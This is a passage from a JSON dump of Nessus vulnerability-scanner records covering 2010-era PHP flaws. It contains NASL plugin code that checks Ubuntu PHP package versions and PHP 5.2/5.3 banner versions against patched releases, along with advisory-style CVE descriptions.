get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php-pear\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cgi\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-cli\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-common\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-curl\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-dev\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-gd\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-ldap\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mhash\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysql\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-mysqli\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-odbc\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-pgsql\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-recode\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-snmp\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sqlite\", 
pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-sybase\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xmlrpc\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"php5-xsl\", pkgver:\"5.1.2-1ubuntu3.19\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php-pear\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-cli\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-common\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-curl\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-dev\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gd\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mhash\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-recode\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif 
(ubuntu_check(osver:\"8.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.4-2ubuntu5.12\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php-pear\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cgi\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-cli\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-common\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-curl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dbg\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-dev\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gd\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-gmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-ldap\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mhash\", 
pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-mysql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-odbc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pgsql\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-pspell\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-recode\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-snmp\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sqlite\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-sybase\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-tidy\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"php5-xsl\", pkgver:\"5.2.6.dfsg.1-3ubuntu4.6\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libapache2-mod-php5filter\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php-pear\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cgi\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-cli\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-common\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-curl\", 
pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dbg\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-dev\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gd\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-gmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-ldap\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mhash\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-mysql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-odbc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pgsql\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-pspell\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-recode\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-snmp\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sqlite\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-sybase\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-tidy\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"php5-xsl\", pkgver:\"5.2.10.dfsg.1-2ubuntu6.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libapache2-mod-php5filter\", 
pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php-pear\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cgi\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-cli\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-common\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-curl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-dbg\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-dev\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-enchant\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-gd\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-gmp\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-intl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-ldap\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-mysql\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-odbc\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-pgsql\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-pspell\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-recode\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-snmp\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-sqlite\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", 
pkgname:\"php5-sybase\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-tidy\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-xmlrpc\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"php5-xsl\", pkgver:\"5.3.2-1ubuntu4.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php5filter / php-pear / php5 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:29:35", "description": "According to its banner, the version of PHP 5.2 installed on the remote host is older than 5.2.14. Such versions may be affected by several security issues :\n\n - An error exists when processing invalid XML-RPC requests that can lead to a NULL pointer dereference. 
(bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'fnmatch' that can lead to stack exhaustion.\n\n - An error exists in the sqlite extension that could allow arbitrary memory access.\n\n - A memory corruption error exists in the function 'substr_replace'.\n\n - The following functions are not properly protected against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, iconv_mime_decode, iconv_substr, iconv_mime_encode, htmlentities, htmlspecialchars, str_getcsv, http_build_query, strpbrk, strstr, str_pad, str_word_count, wordwrap, strtok, setcookie, strip_tags, trim, ltrim, rtrim, parse_str, pack, unpack, uasort, preg_match, strrchr, strchr, substr, str_repeat (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW (CVE-2010-2191)\n\n - The default session serializer contains an error that can be exploited when assigning session variables having user defined names. Arbitrary serialized values can be injected into sessions by including the PS_UNDEF_MARKER, '!', character in variable names.\n\n - A use-after-free error exists in the function 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the function 'var_export' when handling certain error conditions. 
(CVE-2010-2531)", "cvss3": {}, "published": "2010-08-04T00:00:00", "type": "nessus", "title": "PHP 5.2 < 5.2.14 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1581", "CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3065"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_2_14.NASL", "href": "https://www.tenable.com/plugins/nessus/48244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48244);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2007-1581\",\n \"CVE-2010-0397\",\n \"CVE-2010-1860\",\n \"CVE-2010-1862\",\n \"CVE-2010-1864\",\n \"CVE-2010-2097\",\n \"CVE-2010-2100\",\n \"CVE-2010-2101\",\n \"CVE-2010-2190\",\n \"CVE-2010-2191\",\n \"CVE-2010-2225\",\n \"CVE-2010-2484\",\n \"CVE-2010-2531\",\n \"CVE-2010-3065\"\n );\n script_bugtraq_id(38708, 40948, 41991);\n script_xref(name:\"SECUNIA\", value:\"39675\");\n script_xref(name:\"SECUNIA\", value:\"40268\");\n\n script_name(english:\"PHP 5.2 < 5.2.14 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.2 installed on the\nremote host is older than 5.2.14. Such versions may be affected by\nseveral security issues :\n\n - An error exists when processing invalid XML-RPC \n requests that can lead to a NULL pointer\n dereference. 
(bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'fnmatch' that can lead\n to stack exhaustion.\n\n - An error exists in the sqlite extension that could \n allow arbitrary memory access.\n\n - A memory corruption error exists in the function\n 'substr_replace'.\n\n - The following functions are not properly protected\n against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, \n iconv_mime_decode, iconv_substr, iconv_mime_encode,\n htmlentities, htmlspecialchars, str_getcsv,\n http_build_query, strpbrk, strstr, str_pad,\n str_word_count, wordwrap, strtok, setcookie, \n strip_tags, trim, ltrim, rtrim, parse_str, pack, unpack, \n uasort, preg_match, strrchr, strchr, substr, str_repeat\n (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\n CVE-2010-2097, CVE-2010-2100, CVE-2010-2101,\n CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes are not properly protected \n against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW\n (CVE-2010-2191)\n\n - The default session serializer contains an error\n that can be exploited when assigning session\n variables having user defined names. Arbitrary\n serialized values can be injected into sessions by\n including the PS_UNDEF_MARKER, '!', character in\n variable names.\n\n - A use-after-free error exists in the function\n 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the\n function 'var_export' when handling certain error \n conditions. 
(CVE-2010-2531)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/releases/5_2_14.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.2.14\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.2.14 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^5\\.2\\.([0-9]|1[0-3])($|[^0-9])\")\n{\n 
if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 5.2.14\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:29:36", "description": "According to its banner, the version of PHP 5.3 installed on the remote host is older than 5.3.3. Such versions may be affected by several security issues :\n\n - An error exists when processing invalid XML-RPC requests that can lead to a NULL pointer dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'shm_put_var' that is related to resource destruction.\n\n - An error exists in the function 'fnmatch' that can lead to stack exhaustion. (CVE-2010-1917)\n\n - A memory corruption error exists related to call-time pass by reference and callbacks.\n\n - The dechunking filter is vulnerable to buffer overflow.\n\n - An error exists in the sqlite extension that could allow arbitrary memory access.\n\n - An error exists in the 'phar' extension related to string format validation.\n\n - The functions 'mysqlnd_list_fields' and 'mysqlnd_change_user' are vulnerable to buffer overflow.\n\n - The Mysqlnd extension is vulnerable to buffer overflow attack when handling error packets.\n\n - The following functions are not properly protected against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, iconv_mime_decode, iconv_substr, iconv_mime_encode, htmlentities, htmlspecialchars, str_getcsv, http_build_query, strpbrk, strtr, str_pad, str_word_count, wordwrap, strtok, setcookie, strip_tags, trim, ltrim, rtrim, substr_replace, parse_str, pack, unpack, uasort, preg_match, strrchr (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2484)\n\n - The following opcodes 
are not properly protected against function interruptions :\n\n ZEND_CONCAT, ZEND_ASSIGN_CONCAT, ZEND_FETCH_RW, XOR (CVE-2010-2191)\n\n - The default session serializer contains an error that can be exploited when assigning session variables having user defined names. Arbitrary serialized values can be injected into sessions by including the PS_UNDEF_MARKER, '!', character in variable names.\n\n - A use-after-free error exists in the function 'spl_object_storage_attach'. (CVE-2010-2225)\n\n - An information disclosure vulnerability exists in the function 'var_export' when handling certain error conditions. (CVE-2010-2531)", "cvss3": {}, "published": "2010-08-04T00:00:00", "type": "nessus", "title": "PHP 5.3 < 5.3.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1581", "CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1917", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2531", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_3_3.NASL", "href": "https://www.tenable.com/plugins/nessus/48245", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48245);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2007-1581\",\n \"CVE-2010-0397\",\n \"CVE-2010-1860\",\n \"CVE-2010-1862\",\n \"CVE-2010-1864\",\n \"CVE-2010-1917\",\n \"CVE-2010-2097\",\n \"CVE-2010-2100\",\n \"CVE-2010-2101\",\n \"CVE-2010-2190\",\n \"CVE-2010-2191\",\n \"CVE-2010-2225\",\n \"CVE-2010-2484\",\n \"CVE-2010-2531\",\n \"CVE-2010-3062\",\n \"CVE-2010-3063\",\n \"CVE-2010-3064\",\n \"CVE-2010-3065\"\n );\n script_bugtraq_id(\n 38708,\n 
40461,\n 40948,\n 41991\n );\n script_xref(name:\"SECUNIA\", value:\"39675\");\n script_xref(name:\"SECUNIA\", value:\"40268\");\n\n script_name(english:\"PHP 5.3 < 5.3.3 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.3 installed on the\nremote host is older than 5.3.3. Such versions may be affected by\nseveral security issues :\n\n - An error exists when processing invalid XML-RPC \n requests that can lead to a NULL pointer\n dereference. (bug #51288) (CVE-2010-0397)\n\n - An error exists in the function 'shm_put_var' that\n is related to resource destruction.\n\n - An error exists in the function 'fnmatch' that can lead\n to stack exhaustion. (CVE-2010-1917)\n\n - A memory corruption error exists related to call-time\n pass by reference and callbacks.\n\n - The dechunking filter is vulnerable to buffer overflow.\n\n - An error exists in the sqlite extension that could \n allow arbitrary memory access.\n\n - An error exists in the 'phar' extension related to \n string format validation.\n\n - The functions 'mysqlnd_list_fields' and \n 'mysqlnd_change_user' are vulnerable to buffer overflow.\n\n - The Mysqlnd extension is vulnerable to buffer overflow\n attack when handling error packets.\n\n - The following functions are not properly protected\n against function interruptions :\n\n addcslashes, chunk_split, html_entity_decode, \n iconv_mime_decode, iconv_substr, iconv_mime_encode,\n htmlentities, htmlspecialchars, str_getcsv,\n http_build_query, strpbrk, strtr, str_pad,\n str_word_count, wordwrap, strtok, setcookie, \n strip_tags, trim, ltrim, rtrim, substr_replace,\n parse_str, pack, unpack, uasort, preg_match, strrchr\n (CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\n CVE-2010-2097, 